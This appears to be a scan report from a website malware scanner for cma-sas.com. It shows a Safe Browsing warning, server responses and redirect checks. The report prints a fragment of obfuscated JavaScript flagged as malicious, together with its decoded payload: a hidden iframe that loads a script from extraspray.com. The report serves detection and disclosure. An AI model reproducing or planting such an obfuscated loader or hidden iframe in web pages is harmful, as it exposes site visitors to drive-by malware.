Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cma-sas.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cma-sas.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 19:20:25 GMT Location: http://www.cma-sas.com/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.cma-sas.com/ | 200 OK Content-Length: 7855 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c274acb4b1h4a115ff7197e8(h4a115ff719bcc){ var h4a115ff71a417=16; return (parseInt(h4a115ff719bcc,h4a115ff71a417));}function h4a115ff71b16b(h4a115ff71b729){ var h4a115ff71bb13='';h4a115ff71caba=String.fromCharCode;for(h4a115ff71bef8=0;h4a115ff71bef8<h4a115ff71b729.length;h4a115ff71bef8+=2){ h4a115ff71bb13+=(h4a115ff71caba(c274acb4b1h4a115ff7197e8(h4a115ff71b729.substr(h4a115ff71bef8,2))));}return h4a115ff71bb13;} var rff='';var h4a115ff71ce98='3C7'+rff+'3637'+rff+'2697'+rff+'07'+rff+ Decoded script: <iframe name=c27 src='http://extraspray.com/in.php?'+Math.round(Math.random()*36270)+'90ab33ee12d' width=65 height=558 style='visibility:hidden'></iframe> Antivirus reports:
| ||
http://www.cma-sas.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cma-sas.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 19:20:25 GMT
Location: http://www.cma-sas.com/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
GET / HTTP/1.1
Host: cma-sas.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 19:20:25 GMT
Location: http://www.cma-sas.com/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cma-sas.com
Referer: http://www.google.com/search?q=cma-sas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cma-sas.com
Referer: http://www.google.com/search?q=cma-sas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.